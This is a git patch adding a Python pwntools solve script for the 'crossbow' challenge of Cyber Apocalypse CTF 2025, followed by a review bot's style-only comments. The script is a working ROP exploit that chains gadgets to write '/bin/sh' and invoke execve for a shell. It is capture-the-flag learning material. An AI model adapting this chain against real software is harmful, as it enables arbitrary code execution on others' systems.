From 22ae6d18efe89af13d63087d7c775633c8d2b6e5 Mon Sep 17 00:00:00 2001
From: jc
Date: Thu, 27 Mar 2025 23:57:18 +0300
Subject: [PATCH] solve script

---
 .../crossbow/a.py | 37 +++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py

diff --git a/cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py b/cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py
new file mode 100644
index 0000000..f326158
--- /dev/null
+++ b/cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py
@@ -0,0 +1,37 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./crossbow", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+ss = lambda a: r.sendlineafter(b"> ", a)
+
+# gadgets
+pop_rax = 0x401001
+pop_rdi = 0x401d6c
+pop_rsi = 0x40566b
+pop_rdx = 0x401139
+syscall = 0x4015d3
+mov_rax_rdi = 0x4020f5
+
+# buf
+buf = b"JUNK"*2
+buf += p64(pop_rax)
+buf += b"/bin/sh\0"
+buf += p64(pop_rdi)
+buf += p64(0x40d500)
+buf += p64(mov_rax_rdi)
+buf += p64(pop_rax)
+buf += p64(59)
+buf += p64(pop_rsi)
+buf += p64(0)
+buf += p64(pop_rdx)
+buf += p64(0)
+buf += p64(syscall)
+s(b"-2")
+ss(buf)
+
+r.interactive()
\ No newline at end of file
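Review bot: The helpers `s` and `ss` are lambdas bound to names (PEP 8 E731); plain functions such as `def s(a): return r.sendlineafter(b": ", a)` and `def ss(a): return r.sendlineafter(b"> ", a)` would read better and give a place for a one-line docstring. `target` is bound in `context.binary = target = ELF(...)` but never referenced afterwards, so either drop the extra name or use it. The gadget addresses under `# gadgets` and the literal `0x40d500` are undocumented magic numbers; a comment beside each naming the instruction sequence it points at and how it was located (e.g. `# <tool used>: <instruction> ; ret`) would make the script maintainable when the binary changes. The file also ends without a trailing newline after `r.interactive()`, which most linters flag.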